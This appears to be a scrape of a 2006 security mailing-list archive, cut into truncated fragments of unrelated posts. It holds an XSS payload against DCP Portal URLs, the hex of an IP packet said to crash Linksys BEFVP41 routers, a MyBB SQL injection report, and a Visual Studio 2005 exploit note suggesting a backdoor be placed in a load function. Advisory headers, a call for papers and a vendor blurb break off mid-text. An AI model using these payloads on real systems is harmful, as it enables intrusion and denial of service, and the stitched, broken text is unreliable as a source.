Hey
this is a bug report for mybb software ( forum software downloadable from
http://www.mybboard.com)
bug found by imei;
bug is in usercp.php file line 830 (ver 1.0.2 latest ver) that allows SQL
injection
bug is in result of poor checking for $mybb-input['threadmode'] value that can
have quote
##Night_WarriorKurdish Hacker
##night_warrior771[at]hotmail.com
##DCP Portal Cross-Site Scripting Vulnerability
##http://www.dcp-portal.org
http://vicktimhost/calendar.php?show=full_months=1submit=GOday=[XSS]
http://vicktimhost/search.php post this code
scriptalert('night_warrior');/script
Linksys BEFVP41 (possibly others) (not sure which firmware) can be
instantenously crashed by sending a specially crafted IP packet with a null
length for IP option #0xE4 , like this one:
00 0f 66 99 a3 45 00 10 5a cc 59 84 08 00 46 00
00 2c 04 d2 00 00 ff aa 06 2a c0 a8 01 65 43 08
c6 15 e4
Sorry, if you receive multiple copies of this Call for Papers.
RECENT UPDATES!!!
-
- Due to multiple requests the paper submission deadline has been extended
to Friday, January 27, 2006!
- Selected papers will be published in revised and extended version in a
special issue of
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Trustix Secure Linux Security Advisory #2006-0002
Package names: clamav, cups, fetchmail, mod_auth_pgsql, sudo
Summary: Multiple vulnerabilities
Date:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Trustix Secure Linux Bugfix Advisory #2006-0001
Package names: postgresql
Summary: Various bug fixes
Date: 2006-01-13
Affected versions: Trustix
Web Site : http://www.ddsn.com and http://www.cm3cms.com
Description :
DDSN is an expert provider of professional services surrounding the science of
content management: Design, information architecture, deployment, and
integration.
In addition we offer our own content management software:
Hi,
I coded a remote code execution exploit for visual studio 2005 and below.
If you open a solution and you click on the Form1.cs file the code inside the
UserControl1_Load function is executed. You can code your backdoor inside this
function. Basically the exploit only start a calc.exe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:013
http://www.mandriva.com/security/